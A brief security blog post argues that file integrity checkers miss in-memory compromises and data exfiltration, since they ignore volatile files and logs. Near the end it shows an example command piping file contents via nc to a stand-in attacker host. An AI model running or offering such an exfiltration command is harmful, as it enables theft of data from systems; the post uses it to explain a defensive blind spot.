I was talking with two prominent security professionals today, and the topic of integrity checking was touched. Got some food for afterthoughts…
If you run full integrity checking on all your file systems, you will have a good knowledge of which changes that are made to your system. Changed files, new files, deleted files etc. But for common use, seeing that a temporary file is written to disk, say a PHP session, or looking at a temporary file created or files being changed once someone logs in, or log files that constantly gets new content and will be different each time your md5/sha1 them etc, might be just to much… or, if you have time.. good for you.
Thats why most file integrity checkers are “tuned” default to ignore *something*. So there should be places on the file system, that could have places to hide files from integrity checkers.
My point in all this, is that a file integrity checker alone, is not really giving you any real insight into *bad things on your machine*. Why ? Something might be in your memory… Take my last blog post as an example. This will give a shell on the system, but will not leave any new files, or change them, except for the apache log file though 🙂 But each HTTP request would, so file integrity checking the live log file, would not make too much sens.
Say someone got a cmd/shell on your machine. Doing
`cat somefile` would not default trigger any normal integrity checker. Then doing
`"cat somefile" | nc evil-storage-machine.ru 80` would go unnoticed to a file integrity checker.
So you need something more…